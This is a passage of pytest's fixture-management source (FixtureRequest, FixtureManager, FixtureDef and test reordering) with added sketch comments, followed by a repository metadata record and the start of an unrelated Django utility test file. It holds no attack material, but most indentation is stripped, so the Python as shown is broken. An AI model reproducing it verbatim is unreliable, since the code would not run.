if hasattr(self, "callspec"):
callspec = self.callspec
assert not callspec.funcargs
self._genid = callspec.id
if hasattr(callspec, "param"):
self.param = callspec.param
self._request = FixtureRequest(self)
@property
def function(self):
"underlying python 'function' object"
return getattr(self.obj, 'im_func', self.obj)
def _getobj(self):
name = self.name
i = name.find("[") # parametrization
if i != -1:
name = name[:i]
return getattr(self.parent.obj, name)
@property
def _pyfuncitem(self):
"(compatonly) for code expecting pytest-2.2 style request objects"
return self
def _isyieldedfunction(self):
return getattr(self, "_args", None) is not None
def runtest(self):
""" execute the underlying test function. """
self.ihook.pytest_pyfunc_call(pyfuncitem=self)
def setup(self):
        # check if parametrization happened with an empty list
try:
self.callspec._emptyparamspecified
except AttributeError:
pass
else:
fs, lineno = self._getfslineno()
pytest.skip("got empty parameter set, function %s at %s:%d" %(
self.function.__name__, fs, lineno))
super(Function, self).setup()
fillfixtures(self)
scope2props = dict(session=())
scope2props["module"] = ("fspath", "module")
scope2props["class"] = scope2props["module"] + ("cls",)
scope2props["instance"] = scope2props["class"] + ("instance", )
scope2props["function"] = scope2props["instance"] + ("function", "keywords")
def scopeproperty(name=None, doc=None):
def decoratescope(func):
scopename = name or func.__name__
def provide(self):
if func.__name__ in scope2props[self.scope]:
return func(self)
raise AttributeError("%s not available in %s-scoped context" % (
scopename, self.scope))
return property(provide, None, None, func.__doc__)
return decoratescope
class FixtureRequest(FuncargnamesCompatAttr):
""" A request for a fixture from a test or fixture function.
A request object gives access to the requesting test context
and has an optional ``param`` attribute in case
the fixture is parametrized indirectly.
"""
def __init__(self, pyfuncitem):
self._pyfuncitem = pyfuncitem
#: fixture for which this request is being performed
self.fixturename = None
#: Scope string, one of "function", "cls", "module", "session"
self.scope = "function"
self._funcargs = {}
self._fixturedefs = {}
fixtureinfo = pyfuncitem._fixtureinfo
self._arg2fixturedefs = fixtureinfo.name2fixturedefs.copy()
self._arg2index = {}
self.fixturenames = fixtureinfo.names_closure
self._fixturemanager = pyfuncitem.session._fixturemanager
@property
def node(self):
""" underlying collection node (depends on current request scope)"""
return self._getscopeitem(self.scope)
def _getnextfixturedef(self, argname):
fixturedefs = self._arg2fixturedefs.get(argname, None)
if fixturedefs is None:
            # we arrive here because of a dynamic call to
# getfuncargvalue(argname) usage which was naturally
# not known at parsing/collection time
fixturedefs = self._fixturemanager.getfixturedefs(
argname, self._pyfuncitem.parent.nodeid)
self._arg2fixturedefs[argname] = fixturedefs
# fixturedefs list is immutable so we maintain a decreasing index
index = self._arg2index.get(argname, 0) - 1
if fixturedefs is None or (-index > len(fixturedefs)):
raise FixtureLookupError(argname, self)
self._arg2index[argname] = index
return fixturedefs[index]
@property
def config(self):
""" the pytest config object associated with this request. """
return self._pyfuncitem.config
@scopeproperty()
def function(self):
""" test function object if the request has a per-function scope. """
return self._pyfuncitem.obj
@scopeproperty("class")
def cls(self):
""" class (can be None) where the test function was collected. """
clscol = self._pyfuncitem.getparent(pytest.Class)
if clscol:
return clscol.obj
@property
def instance(self):
""" instance (can be None) on which test function was collected. """
# unittest support hack, see _pytest.unittest.TestCaseFunction
try:
return self._pyfuncitem._testcase
except AttributeError:
function = getattr(self, "function", None)
if function is not None:
return py.builtin._getimself(function)
@scopeproperty()
def module(self):
""" python module object where the test function was collected. """
return self._pyfuncitem.getparent(pytest.Module).obj
@scopeproperty()
def fspath(self):
""" the file system path of the test module which collected this test. """
return self._pyfuncitem.fspath
@property
def keywords(self):
""" keywords/markers dictionary for the underlying node. """
return self.node.keywords
@property
def session(self):
""" pytest session object. """
return self._pyfuncitem.session
def addfinalizer(self, finalizer):
""" add finalizer/teardown function to be called after the
last test within the requesting test context finished
execution. """
# XXX usually this method is shadowed by fixturedef specific ones
self._addfinalizer(finalizer, scope=self.scope)
def _addfinalizer(self, finalizer, scope):
colitem = self._getscopeitem(scope)
self._pyfuncitem.session._setupstate.addfinalizer(
finalizer=finalizer, colitem=colitem)
def applymarker(self, marker):
""" Apply a marker to a single test function invocation.
This method is useful if you don't want to have a keyword/marker
on all function invocations.
:arg marker: a :py:class:`_pytest.mark.MarkDecorator` object
created by a call to ``pytest.mark.NAME(...)``.
"""
try:
self.node.keywords[marker.markname] = marker
except AttributeError:
raise ValueError(marker)
def raiseerror(self, msg):
""" raise a FixtureLookupError with the given message. """
raise self._fixturemanager.FixtureLookupError(None, self, msg)
def _fillfixtures(self):
item = self._pyfuncitem
fixturenames = getattr(item, "fixturenames", self.fixturenames)
for argname in fixturenames:
if argname not in item.funcargs:
item.funcargs[argname] = self.getfuncargvalue(argname)
def cached_setup(self, setup, teardown=None, scope="module", extrakey=None):
""" (deprecated) Return a testing resource managed by ``setup`` &
``teardown`` calls. ``scope`` and ``extrakey`` determine when the
``teardown`` function will be called so that subsequent calls to
``setup`` would recreate the resource. With pytest-2.3 you often
do not need ``cached_setup()`` as you can directly declare a scope
on a fixture function and register a finalizer through
``request.addfinalizer()``.
:arg teardown: function receiving a previously setup resource.
:arg setup: a no-argument function creating a resource.
:arg scope: a string value out of ``function``, ``class``, ``module``
or ``session`` indicating the caching lifecycle of the resource.
:arg extrakey: added to internal caching key of (funcargname, scope).
"""
if not hasattr(self.config, '_setupcache'):
self.config._setupcache = {} # XXX weakref?
cachekey = (self.fixturename, self._getscopeitem(scope), extrakey)
cache = self.config._setupcache
try:
val = cache[cachekey]
except KeyError:
self._check_scope(self.fixturename, self.scope, scope)
val = setup()
cache[cachekey] = val
if teardown is not None:
def finalizer():
del cache[cachekey]
teardown(val)
self._addfinalizer(finalizer, scope=scope)
return val
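    # Illustrative usage sketch (added for clarity, not part of the original
    # module) of the deprecated cached_setup() call from inside a fixture
    # function; a scoped fixture plus request.addfinalizer() is the modern
    # replacement. Names are examples only.
    #
    #     @pytest.fixture
    #     def shared_resource(request):
    #         return request.cached_setup(
    #             setup=lambda: {"ready": True},
    #             teardown=lambda res: res.clear(),
    #             scope="session")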
def getfuncargvalue(self, argname):
""" Dynamically retrieve a named fixture function argument.
As of pytest-2.3, it is easier and usually better to access other
        fixture values by stating them as input arguments in the fixture
        function. If you can only decide about using another fixture at test
setup time, you may use this function to retrieve it inside a fixture
function body.
"""
return self._get_active_fixturedef(argname).cached_result[0]
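    # Illustrative usage sketch (added for clarity, not part of the original
    # module): choosing between two fixtures at setup time; "fast_db"/"full_db"
    # and the "--fast" option are example names only.
    #
    #     @pytest.fixture
    #     def db(request):
    #         name = "fast_db" if request.config.getoption("--fast", False) else "full_db"
    #         return request.getfuncargvalue(name)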
def _get_active_fixturedef(self, argname):
try:
return self._fixturedefs[argname]
except KeyError:
try:
fixturedef = self._getnextfixturedef(argname)
except FixtureLookupError:
if argname == "request":
class PseudoFixtureDef:
cached_result = (self, [0], None)
scope = "function"
return PseudoFixtureDef
raise
# remove indent to prevent the python3 exception
# from leaking into the call
result = self._getfuncargvalue(fixturedef)
self._funcargs[argname] = result
self._fixturedefs[argname] = fixturedef
return fixturedef
def _get_fixturestack(self):
current = self
l = []
while 1:
fixturedef = getattr(current, "_fixturedef", None)
if fixturedef is None:
l.reverse()
return l
l.append(fixturedef)
current = current._parent_request
def _getfuncargvalue(self, fixturedef):
# prepare a subrequest object before calling fixture function
# (latter managed by fixturedef)
argname = fixturedef.argname
funcitem = self._pyfuncitem
scope = fixturedef.scope
try:
param = funcitem.callspec.getparam(argname)
except (AttributeError, ValueError):
param = NOTSET
param_index = 0
else:
# indices might not be set if old-style metafunc.addcall() was used
param_index = funcitem.callspec.indices.get(argname, 0)
# if a parametrize invocation set a scope it will override
# the static scope defined with the fixture function
paramscopenum = funcitem.callspec._arg2scopenum.get(argname)
if paramscopenum is not None:
scope = scopes[paramscopenum]
subrequest = SubRequest(self, scope, param, param_index, fixturedef)
# check if a higher-level scoped fixture accesses a lower level one
subrequest._check_scope(argname, self.scope, scope)
# clear sys.exc_info before invoking the fixture (python bug?)
        # if it's not explicitly cleared it will leak into the call
exc_clear()
try:
# call the fixture function
val = fixturedef.execute(request=subrequest)
finally:
# if fixture function failed it might have registered finalizers
self.session._setupstate.addfinalizer(fixturedef.finish,
subrequest.node)
return val
def _check_scope(self, argname, invoking_scope, requested_scope):
if argname == "request":
return
if scopemismatch(invoking_scope, requested_scope):
# try to report something helpful
lines = self._factorytraceback()
pytest.fail("ScopeMismatch: You tried to access the %r scoped "
"fixture %r with a %r scoped request object, "
"involved factories\n%s" %(
(requested_scope, argname, invoking_scope, "\n".join(lines))),
pytrace=False)
def _factorytraceback(self):
lines = []
for fixturedef in self._get_fixturestack():
factory = fixturedef.func
fs, lineno = getfslineno(factory)
p = self._pyfuncitem.session.fspath.bestrelpath(fs)
args = inspect.formatargspec(*inspect.getargspec(factory))
lines.append("%s:%d: def %s%s" %(
p, lineno, factory.__name__, args))
return lines
def _getscopeitem(self, scope):
if scope == "function":
# this might also be a non-function Item despite its attribute name
return self._pyfuncitem
node = get_scope_node(self._pyfuncitem, scope)
if node is None and scope == "class":
# fallback to function item itself
node = self._pyfuncitem
assert node
return node
def __repr__(self):
return "<FixtureRequest for %r>" %(self.node)
class SubRequest(FixtureRequest):
""" a sub request for handling getting a fixture from a
test function/fixture. """
def __init__(self, request, scope, param, param_index, fixturedef):
self._parent_request = request
self.fixturename = fixturedef.argname
if param is not NOTSET:
self.param = param
self.param_index = param_index
self.scope = scope
self._fixturedef = fixturedef
self.addfinalizer = fixturedef.addfinalizer
self._pyfuncitem = request._pyfuncitem
self._funcargs = request._funcargs
self._fixturedefs = request._fixturedefs
self._arg2fixturedefs = request._arg2fixturedefs
self._arg2index = request._arg2index
self.fixturenames = request.fixturenames
self._fixturemanager = request._fixturemanager
def __repr__(self):
return "<SubRequest %r for %r>" % (self.fixturename, self._pyfuncitem)
class ScopeMismatchError(Exception):
""" A fixture function tries to use a different fixture function which
which has a lower scope (e.g. a Session one calls a function one)
"""
scopes = "session module class function".split()
scopenum_function = scopes.index("function")
def scopemismatch(currentscope, newscope):
return scopes.index(newscope) > scopes.index(currentscope)
class FixtureLookupError(LookupError):
""" could not return a requested Fixture (missing or invalid). """
def __init__(self, argname, request, msg=None):
self.argname = argname
self.request = request
self.fixturestack = request._get_fixturestack()
self.msg = msg
def formatrepr(self):
tblines = []
addline = tblines.append
stack = [self.request._pyfuncitem.obj]
stack.extend(map(lambda x: x.func, self.fixturestack))
msg = self.msg
if msg is not None:
            stack = stack[:-1]  # the last fixture raised an error, let's present
# it at the requesting side
for function in stack:
fspath, lineno = getfslineno(function)
try:
lines, _ = inspect.getsourcelines(get_real_func(function))
except IOError:
error_msg = "file %s, line %s: source code not available"
addline(error_msg % (fspath, lineno+1))
else:
addline("file %s, line %s" % (fspath, lineno+1))
for i, line in enumerate(lines):
line = line.rstrip()
addline(" " + line)
if line.lstrip().startswith('def'):
break
if msg is None:
fm = self.request._fixturemanager
available = []
for name, fixturedef in fm._arg2fixturedefs.items():
parentid = self.request._pyfuncitem.parent.nodeid
faclist = list(fm._matchfactories(fixturedef, parentid))
if faclist:
available.append(name)
msg = "fixture %r not found" % (self.argname,)
msg += "\n available fixtures: %s" %(", ".join(available),)
msg += "\n use 'py.test --fixtures [testpath]' for help on them."
return FixtureLookupErrorRepr(fspath, lineno, tblines, msg, self.argname)
class FixtureLookupErrorRepr(TerminalRepr):
def __init__(self, filename, firstlineno, tblines, errorstring, argname):
self.tblines = tblines
self.errorstring = errorstring
self.filename = filename
self.firstlineno = firstlineno
self.argname = argname
def toterminal(self, tw):
#tw.line("FixtureLookupError: %s" %(self.argname), red=True)
for tbline in self.tblines:
tw.line(tbline.rstrip())
for line in self.errorstring.split("\n"):
tw.line(" " + line.strip(), red=True)
tw.line()
tw.line("%s:%d" % (self.filename, self.firstlineno+1))
class FixtureManager:
"""
pytest fixtures definitions and information is stored and managed
from this class.
During collection fm.parsefactories() is called multiple times to parse
fixture function definitions into FixtureDef objects and internal
data structures.
During collection of test functions, metafunc-mechanics instantiate
a FuncFixtureInfo object which is cached per node/func-name.
This FuncFixtureInfo object is later retrieved by Function nodes
which themselves offer a fixturenames attribute.
The FuncFixtureInfo object holds information about fixtures and FixtureDefs
relevant for a particular function. An initial list of fixtures is
assembled like this:
- ini-defined usefixtures
- autouse-marked fixtures along the collection chain up from the function
- usefixtures markers at module/class/function level
- test function funcargs
Subsequently the funcfixtureinfo.fixturenames attribute is computed
    as the closure of the fixtures needed to set up the initial fixtures,
    i.e. fixtures needed by fixture functions themselves are appended
    to the fixturenames list.
    During the test-setup phase all fixturenames are instantiated, retrieved
by a lookup of their FuncFixtureInfo.
"""
_argprefix = "pytest_funcarg__"
FixtureLookupError = FixtureLookupError
FixtureLookupErrorRepr = FixtureLookupErrorRepr
def __init__(self, session):
self.session = session
self.config = session.config
self._arg2fixturedefs = {}
self._holderobjseen = set()
self._arg2finish = {}
self._nodeid_and_autousenames = [("", self.config.getini("usefixtures"))]
session.config.pluginmanager.register(self, "funcmanage")
def getfixtureinfo(self, node, func, cls, funcargs=True):
if funcargs and not hasattr(node, "nofuncargs"):
if cls is not None:
startindex = 1
else:
startindex = None
argnames = getfuncargnames(func, startindex)
else:
argnames = ()
usefixtures = getattr(func, "usefixtures", None)
initialnames = argnames
if usefixtures is not None:
initialnames = usefixtures.args + initialnames
fm = node.session._fixturemanager
names_closure, arg2fixturedefs = fm.getfixtureclosure(initialnames,
node)
return FuncFixtureInfo(argnames, names_closure, arg2fixturedefs)
def pytest_plugin_registered(self, plugin):
nodeid = None
try:
p = py.path.local(plugin.__file__)
except AttributeError:
pass
else:
# construct the base nodeid which is later used to check
# what fixtures are visible for particular tests (as denoted
# by their test id)
if p.basename.startswith("conftest.py"):
nodeid = p.dirpath().relto(self.config.rootdir)
if p.sep != "/":
nodeid = nodeid.replace(p.sep, "/")
self.parsefactories(plugin, nodeid)
def _getautousenames(self, nodeid):
""" return a tuple of fixture names to be used. """
autousenames = []
for baseid, basenames in self._nodeid_and_autousenames:
if nodeid.startswith(baseid):
if baseid:
i = len(baseid)
nextchar = nodeid[i:i+1]
if nextchar and nextchar not in ":/":
continue
autousenames.extend(basenames)
# make sure autousenames are sorted by scope, scopenum 0 is session
autousenames.sort(
key=lambda x: self._arg2fixturedefs[x][-1].scopenum)
return autousenames
def getfixtureclosure(self, fixturenames, parentnode):
        # collect the closure of all fixtures, starting with the given
# fixturenames as the initial set. As we have to visit all
        # factory definitions anyway, we also return an arg2fixturedefs
# mapping so that the caller can reuse it and does not have
# to re-discover fixturedefs again for each fixturename
# (discovering matching fixtures for a given name/node is expensive)
parentid = parentnode.nodeid
fixturenames_closure = self._getautousenames(parentid)
def merge(otherlist):
for arg in otherlist:
if arg not in fixturenames_closure:
fixturenames_closure.append(arg)
merge(fixturenames)
arg2fixturedefs = {}
lastlen = -1
while lastlen != len(fixturenames_closure):
lastlen = len(fixturenames_closure)
for argname in fixturenames_closure:
if argname in arg2fixturedefs:
continue
fixturedefs = self.getfixturedefs(argname, parentid)
if fixturedefs:
arg2fixturedefs[argname] = fixturedefs
merge(fixturedefs[-1].argnames)
return fixturenames_closure, arg2fixturedefs
def pytest_generate_tests(self, metafunc):
for argname in metafunc.fixturenames:
faclist = metafunc._arg2fixturedefs.get(argname)
if faclist:
fixturedef = faclist[-1]
if fixturedef.params is not None:
func_params = getattr(getattr(metafunc.function, 'parametrize', None), 'args', [[None]])
# skip directly parametrized arguments
if argname not in func_params:
metafunc.parametrize(argname, fixturedef.params,
indirect=True, scope=fixturedef.scope,
ids=fixturedef.ids)
else:
continue # will raise FixtureLookupError at setup time
def pytest_collection_modifyitems(self, items):
# separate parametrized setups
items[:] = reorder_items(items)
def parsefactories(self, node_or_obj, nodeid=NOTSET, unittest=False):
if nodeid is not NOTSET:
holderobj = node_or_obj
else:
holderobj = node_or_obj.obj
nodeid = node_or_obj.nodeid
if holderobj in self._holderobjseen:
return
self._holderobjseen.add(holderobj)
autousenames = []
for name in dir(holderobj):
obj = getattr(holderobj, name, None)
if not callable(obj):
continue
# fixture functions have a pytest_funcarg__ prefix (pre-2.3 style)
# or are "@pytest.fixture" marked
marker = getfixturemarker(obj)
if marker is None:
if not name.startswith(self._argprefix):
continue
marker = defaultfuncargprefixmarker
name = name[len(self._argprefix):]
elif not isinstance(marker, FixtureFunctionMarker):
# magic globals with __getattr__ might have got us a wrong
# fixture attribute
continue
else:
assert not name.startswith(self._argprefix)
fixturedef = FixtureDef(self, nodeid, name, obj,
marker.scope, marker.params,
yieldctx=marker.yieldctx,
unittest=unittest, ids=marker.ids)
faclist = self._arg2fixturedefs.setdefault(name, [])
if fixturedef.has_location:
faclist.append(fixturedef)
else:
# fixturedefs with no location are at the front
# so this inserts the current fixturedef after the
# existing fixturedefs from external plugins but
# before the fixturedefs provided in conftests.
i = len([f for f in faclist if not f.has_location])
faclist.insert(i, fixturedef)
if marker.autouse:
autousenames.append(name)
if autousenames:
self._nodeid_and_autousenames.append((nodeid or '', autousenames))
def getfixturedefs(self, argname, nodeid):
try:
fixturedefs = self._arg2fixturedefs[argname]
except KeyError:
return None
else:
return tuple(self._matchfactories(fixturedefs, nodeid))
def _matchfactories(self, fixturedefs, nodeid):
for fixturedef in fixturedefs:
if nodeid.startswith(fixturedef.baseid):
yield fixturedef
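# Illustrative sketch (not part of the original pytest source): a simplified
# model of the closure computation performed by
# FixtureManager.getfixtureclosure() above, assuming fixtures are described by
# a plain dict mapping each fixture name to the names of the fixtures it
# itself requires; ``name2deps`` and ``_fixture_closure_sketch`` are
# hypothetical names introduced only for this example.
def _fixture_closure_sketch(initial_names, name2deps):
    """Return the transitive closure of fixture names needed by ``initial_names``."""
    closure = list(initial_names)
    lastlen = -1
    while lastlen != len(closure):
        lastlen = len(closure)
        for name in list(closure):
            for dep in name2deps.get(name, ()):
                if dep not in closure:
                    closure.append(dep)
    return closure
# e.g. _fixture_closure_sketch(["db"], {"db": ["tmpdir"], "tmpdir": []})
# returns ["db", "tmpdir"]: fixtures needed by other fixtures are appended to
# the closure, mirroring the FixtureManager docstring.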
def fail_fixturefunc(fixturefunc, msg):
fs, lineno = getfslineno(fixturefunc)
location = "%s:%s" % (fs, lineno+1)
source = py.code.Source(fixturefunc)
pytest.fail(msg + ":\n\n" + str(source.indent()) + "\n" + location,
pytrace=False)
def call_fixture_func(fixturefunc, request, kwargs, yieldctx):
if yieldctx:
if not is_generator(fixturefunc):
fail_fixturefunc(fixturefunc,
msg="yield_fixture requires yield statement in function")
iter = fixturefunc(**kwargs)
next = getattr(iter, "__next__", None)
if next is None:
next = getattr(iter, "next")
res = next()
def teardown():
try:
next()
except StopIteration:
pass
else:
fail_fixturefunc(fixturefunc,
"yield_fixture function has more than one 'yield'")
request.addfinalizer(teardown)
else:
if is_generator(fixturefunc):
fail_fixturefunc(fixturefunc,
msg="pytest.fixture functions cannot use ``yield``. "
"Instead write and return an inner function/generator "
"and let the consumer call and iterate over it.")
res = fixturefunc(**kwargs)
return res
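# Illustrative sketch (not part of the original pytest source): the essence of
# the yield-fixture handling in call_fixture_func() above.  The generator is
# advanced once to obtain the fixture value, and a second advance at teardown
# time must raise StopIteration, i.e. the fixture function may contain exactly
# one ``yield``.  The real code reports errors via fail_fixturefunc() and
# registers the teardown through request.addfinalizer(); this sketch uses a
# plain RuntimeError and simply returns the teardown callable.
def _split_yield_fixture_sketch(genfunc, *args, **kwargs):
    gen = genfunc(*args, **kwargs)
    value = next(gen)                  # setup: run code up to the single yield
    def teardown():
        try:
            next(gen)                  # finalization: run code after the yield
        except StopIteration:
            pass
        else:
            raise RuntimeError("fixture function has more than one 'yield'")
    return value, teardown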
class FixtureDef:
""" A container for a factory definition. """
def __init__(self, fixturemanager, baseid, argname, func, scope, params,
yieldctx, unittest=False, ids=None):
self._fixturemanager = fixturemanager
self.baseid = baseid or ''
self.has_location = baseid is not None
self.func = func
self.argname = argname
self.scope = scope
self.scopenum = scopes.index(scope or "function")
self.params = params
startindex = unittest and 1 or None
self.argnames = getfuncargnames(func, startindex=startindex)
self.yieldctx = yieldctx
self.unittest = unittest
self.ids = ids
self._finalizer = []
def addfinalizer(self, finalizer):
self._finalizer.append(finalizer)
def finish(self):
try:
while self._finalizer:
func = self._finalizer.pop()
func()
finally:
# even if finalization fails, we invalidate
# the cached fixture value
if hasattr(self, "cached_result"):
del self.cached_result
def execute(self, request):
# get required arguments and register our own finish()
# with their finalization
kwargs = {}
for argname in self.argnames:
fixturedef = request._get_active_fixturedef(argname)
result, arg_cache_key, exc = fixturedef.cached_result
request._check_scope(argname, request.scope, fixturedef.scope)
kwargs[argname] = result
if argname != "request":
fixturedef.addfinalizer(self.finish)
my_cache_key = request.param_index
cached_result = getattr(self, "cached_result", None)
if cached_result is not None:
result, cache_key, err = cached_result
if my_cache_key == cache_key:
if err is not None:
py.builtin._reraise(*err)
else:
return result
# we have a previous but differently parametrized fixture instance
# so we need to tear it down before creating a new one
self.finish()
assert not hasattr(self, "cached_result")
fixturefunc = self.func
if self.unittest:
if request.instance is not None:
# bind the unbound method to the TestCase instance
fixturefunc = self.func.__get__(request.instance)
else:
# the fixture function needs to be bound to the actual
# request.instance so that code working with "self" behaves
# as expected.
if request.instance is not None:
fixturefunc = getimfunc(self.func)
if fixturefunc != self.func:
fixturefunc = fixturefunc.__get__(request.instance)
try:
result = call_fixture_func(fixturefunc, request, kwargs,
self.yieldctx)
except Exception:
self.cached_result = (None, my_cache_key, sys.exc_info())
raise
self.cached_result = (result, my_cache_key, None)
return result
def __repr__(self):
return ("<FixtureDef name=%r scope=%r baseid=%r >" %
(self.argname, self.scope, self.baseid))
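# Illustrative sketch (not part of the original pytest source): the caching
# contract used by FixtureDef.execute() above.  A result is cached together
# with the parametrization key it was produced for; a request that arrives
# with a different key tears the old instance down and recomputes.  ``state``,
# ``compute`` and ``cache_key`` are hypothetical stand-ins for the fixturedef
# attributes, the fixture call and request.param_index respectively.
def _cached_execute_sketch(state, compute, cache_key):
    cached = state.get("cached_result")
    if cached is not None:
        result, old_key, err = cached
        if old_key == cache_key:
            if err is not None:
                raise err              # re-raise the previously cached failure
            return result
        state.pop("cached_result", None)   # differently parametrized: discard
    try:
        result = compute()
    except Exception as exc:
        state["cached_result"] = (None, cache_key, exc)
        raise
    state["cached_result"] = (result, cache_key, None)
    return result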
def num_mock_patch_args(function):
""" return number of arguments used up by mock arguments (if any) """
patchings = getattr(function, "patchings", None)
if not patchings:
return 0
mock = sys.modules.get("mock", sys.modules.get("unittest.mock", None))
if mock is not None:
return len([p for p in patchings
if not p.attribute_name and p.new is mock.DEFAULT])
return len(patchings)
def getfuncargnames(function, startindex=None):
# XXX merge with main.py's varnames
#assert not inspect.isclass(function)
realfunction = function
while hasattr(realfunction, "__wrapped__"):
realfunction = realfunction.__wrapped__
if startindex is None:
startindex = inspect.ismethod(function) and 1 or 0
if realfunction != function:
startindex += num_mock_patch_args(function)
function = realfunction
if isinstance(function, functools.partial):
argnames = inspect.getargs(py.code.getrawcode(function.func))[0]
partial = function
argnames = argnames[len(partial.args):]
if partial.keywords:
for kw in partial.keywords:
argnames.remove(kw)
else:
argnames = inspect.getargs(py.code.getrawcode(function))[0]
defaults = getattr(function, 'func_defaults',
getattr(function, '__defaults__', None)) or ()
numdefaults = len(defaults)
if numdefaults:
return tuple(argnames[startindex:-numdefaults])
return tuple(argnames[startindex:])
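# Illustrative sketch (not part of the original pytest source): the core of
# what getfuncargnames() above extracts, shown for a plain function with a
# defaulted trailing argument.  The real function additionally unwraps
# __wrapped__ chains, skips ``self`` for methods, accounts for mock.patch
# decorators and handles functools.partial objects.
def _argnames_sketch():
    import inspect
    def fixture_user(tmpdir, monkeypatch, flag=True):
        pass
    spec = inspect.getfullargspec(fixture_user)
    # trailing arguments with defaults are dropped, just like above
    names = spec.args[:-len(spec.defaults)] if spec.defaults else spec.args
    return tuple(names)                # -> ('tmpdir', 'monkeypatch')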
# algorithm for sorting on a per-parametrized resource setup basis
# it is called for scopenum==0 (session) first and performs sorting
# down to the lower scopes such as to minimize number of "high scope"
# setups and teardowns
def reorder_items(items):
argkeys_cache = {}
for scopenum in range(0, scopenum_function):
argkeys_cache[scopenum] = d = {}
for item in items:
keys = set(get_parametrized_fixture_keys(item, scopenum))
if keys:
d[item] = keys
return reorder_items_atscope(items, set(), argkeys_cache, 0)
def reorder_items_atscope(items, ignore, argkeys_cache, scopenum):
if scopenum >= scopenum_function or len(items) < 3:
return items
items_done = []
while 1:
items_before, items_same, items_other, newignore = \
slice_items(items, ignore, argkeys_cache[scopenum])
items_before = reorder_items_atscope(
            items_before, ignore, argkeys_cache, scopenum + 1)
if items_same is None:
# nothing to reorder in this scope
assert items_other is None
return items_done + items_before
items_done.extend(items_before)
items = items_same + items_other
ignore = newignore
def slice_items(items, ignore, scoped_argkeys_cache):
# we pick the first item which uses a fixture instance in the
# requested scope and which we haven't seen yet. We slice the input
    # items list into a list of items_before, items_same and
    # items_other
if scoped_argkeys_cache: # do we need to do work at all?
it = iter(items)
# first find a slicing key
for i, item in enumerate(it):
argkeys = scoped_argkeys_cache.get(item)
if argkeys is not None:
argkeys = argkeys.difference(ignore)
if argkeys: # found a slicing key
slicing_argkey = argkeys.pop()
items_before = items[:i]
items_same = [item]
items_other = []
# now slice the remainder of the list
for item in it:
argkeys = scoped_argkeys_cache.get(item)
if argkeys and slicing_argkey in argkeys and \
slicing_argkey not in ignore:
items_same.append(item)
else:
items_other.append(item)
newignore = ignore.copy()
newignore.add(slicing_argkey)
return (items_before, items_same, items_other, newignore)
return items, None, None, None
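# Illustrative sketch (not part of the original pytest source): the grouping
# effect that reorder_items()/slice_items() above aim for, shown on toy data.
# ``item2key`` is a hypothetical stand-in for the parametrized argkeys cache;
# items sharing the same high-scope key are pulled next to each other so the
# expensive setup/teardown runs only once per key.
def _reorder_sketch(items, item2key):
    ordered, seen = [], []
    for item in items:
        if item in ordered:
            continue
        ordered.append(item)
        key = item2key.get(item)
        if key is not None and key not in seen:
            seen.append(key)
            same = [other for other in items
                    if other not in ordered and item2key.get(other) == key]
            ordered.extend(same)
    return ordered
# _reorder_sketch(["a", "b", "c", "d"], {"a": "db", "c": "db"})
# -> ["a", "c", "b", "d"]: both "db"-parametrized items run back to back.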
def get_parametrized_fixture_keys(item, scopenum):
""" return list of keys for all parametrized arguments which match
the specified scope. """
assert scopenum < scopenum_function # function
try:
cs = item.callspec
except AttributeError:
pass
else:
        # cs.indices.items() yields argnames in arbitrary order, but
        # different functions (items) can change the order of arguments
        # anyway, so this does not matter much in practice
for argname, param_index in cs.indices.items():
if cs._arg2scopenum[argname] != scopenum:
continue
if scopenum == 0: # session
key = (argname, param_index)
elif scopenum == 1: # module
key = (argname, param_index, item.fspath)
elif scopenum == 2: # class
key = (argname, param_index, item.fspath, item.cls)
yield key
def xunitsetup(obj, name):
meth = getattr(obj, name, None)
if getfixturemarker(meth) is None:
return meth
def getfixturemarker(obj):
""" return fixturemarker or None if it doesn't exist or raised
exceptions."""
try:
return getattr(obj, "_pytestfixturefunction", None)
except KeyboardInterrupt:
raise
except Exception:
# some objects raise errors like request (from flask import request)
# we don't expect them to be fixture functions
return None
scopename2class = {
'class': Class,
'module': Module,
'function': pytest.Item,
}
def get_scope_node(node, scope):
cls = scopename2class.get(scope)
if cls is None:
if scope == "session":
return node.session
raise ValueError("unknown scope")
return node.getparent(cls)
|
{
"content_hash": "8f3c1678aaeec2f60fb2741e47ae42b3",
"timestamp": "",
"source": "github",
"line_count": 2169,
"max_line_length": 108,
"avg_line_length": 38.67542646380821,
"alnum_prop": 0.6022029635104367,
"repo_name": "pelme/pytest",
"id": "88c7d1a39d8a529f81df34d46925dc8fe8288646",
"size": "83887",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "_pytest/python.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1842"
},
{
"name": "Makefile",
"bytes": "916"
},
{
"name": "PowerShell",
"bytes": "5987"
},
{
"name": "Python",
"bytes": "1001588"
},
{
"name": "Shell",
"bytes": "282"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from django.utils.timezone import get_current_timezone
from app.utils import *
from app.myblog.models import Article, Classification
class TestEncodeJson(TestCase):
    def test_encode(self):
        res = encodejson(1, {})
        self.assertIsInstance(res, str)
class TestCreateRandom(TestCase):
def test_create(self):
res = create_random_str(10)
self.assertEqual(len(res), 10)
res = create_random_str(62)
self.assertEqual(len(res), 62)
res = create_random_str(63)
self.assertEqual(res, 'too long str')
def test_format(self):
res = create_random_str(60)
for itm in ['+', '-', '_', '=', '|', '!', '?', '`', '~', '@', '#', '$', '%', '^', '&', '*', '(', ')']:
self.assertNotIn(itm, res)
class TestString2Datetime(TestCase):
def test_convert(self):
sample = '2011-1-1 19:25:01'
res = string_to_datetime(sample)
self.assertIsInstance(res, datetime.datetime)
self.assertEqual(res.second, 1)
self.assertEqual(res.minute, 25)
self.assertEqual(res.hour, 19)
self.assertEqual(res.day, 1)
self.assertEqual(res.month, 1)
self.assertEqual(res.year, 2011)
def test_format(self):
sample = '2015/1/1 23-12-11'
format_str = '%Y/%m/%d %H-%M-%S'
res = string_to_datetime(sample, format_str)
self.assertIsInstance(res, datetime.datetime)
class TestDatetime2Timestamp(TestCase):
def test_convert(self):
sample = datetime.datetime.now()
res = datetime_to_timestamp(sample)
self.assertIsInstance(res, float)
sample.replace(tzinfo=get_current_timezone())
res = datetime_to_timestamp(sample)
self.assertIsInstance(res, float)
class TestDatetime2String(TestCase):
def test_convert(self):
sample = string_to_datetime('2011-1-1 19:25:01')
res = datetime_to_string(sample)
self.assertEqual(res, '2011-01-01 19:25:01')
sample.replace(tzinfo=get_current_timezone())
res = datetime_to_string(sample)
self.assertEqual(res, '2011-01-01 19:25:01')
class TestDatetime2UtcString(TestCase):
def test_convert(self):
